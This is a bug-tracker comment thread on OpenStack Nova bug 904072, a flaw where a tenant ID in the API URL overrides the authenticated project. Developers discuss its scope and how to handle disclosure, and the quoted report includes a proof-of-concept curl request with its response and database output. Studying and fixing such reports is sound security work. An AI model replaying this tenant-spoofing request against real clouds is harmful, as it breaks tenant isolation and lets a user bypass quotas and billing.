Comment 11 for bug 904072

Hi All

>ttx
I'm ok to not disclosing this in the next two
weeks. Me, Rohit and Ravi found this bug.

>Vish
Thank you for your patch.
I have one question. Why we still set project_id from URL?

Cheers
Nati

2011/12/16 Vish Ishaya <email address hidden>:
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated.  The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>>        instance_list = self.compute_api.get_all(context,
>>                                                 search_opts=search_opts)
>>
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it by via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect.  The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects if you are the openstack api using keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url.  EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https://bugs.launchpad.net/bugs/904072
>>
>> Title:
>>  project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>>  Confirmed
>>
>> Bug description:
>>  project_id could be overwritten to any value by URI value.
>>  User can create server on any project (even if it is not exist)
>>  Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>>
>>  --Test condition
>>  user : demo (not admin)
>>  project_id: 2
>>
>>  -- Requeest
>>  stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers  <-- invalid tenant_id
>>
>>  -- Response
>>  {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>>
>>  -- DB result
>>  instance with project_id "tushar2" is created
>>
>>  mysql> select id,project_id from instances;
>>  +----+------------+
>>  | id | project_id |
>>  +----+------------+
>>  |  1 | demo5      |
>>  |  2 | demo5      |
>>  |  3 | tushar     |
>>  |  4 | tushar1    |
>>  |  5 | tushar2    |
>>  |  6 | tushar2    |
>>  |  7 | tushar2    |
>>  +----+------------+
>>  7 rows in set (0.00 sec)
>>
>>  --Cause of this bug
>>  This code set project_id to request object from uri
>>  https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>>
>>  Then this code set the project_id to context object
>>  https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>>
>> To manage notifications about this bug go to:
>> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
>  project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
>  Confirmed
>
> Bug description:
>  project_id could be overwritten to any value by URI value.
>  User can create server on any project (even if it is not exist)
>  Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
>  --Test condition
>  user : demo (not admin)
>  project_id: 2
>
>  -- Requeest
>  stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers  <-- invalid tenant_id
>
>  -- Response
>  {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
>  -- DB result
>  instance with project_id "tushar2" is created
>
>  mysql> select id,project_id from instances;
>  +----+------------+
>  | id | project_id |
>  +----+------------+
>  |  1 | demo5      |
>  |  2 | demo5      |
>  |  3 | tushar     |
>  |  4 | tushar1    |
>  |  5 | tushar2    |
>  |  6 | tushar2    |
>  |  7 | tushar2    |
>  +----+------------+
>  7 rows in set (0.00 sec)
>
>  --Cause of this bug
>  This code set project_id to request object from uri
>  https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
>  Then this code set the project_id to context object
>  https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions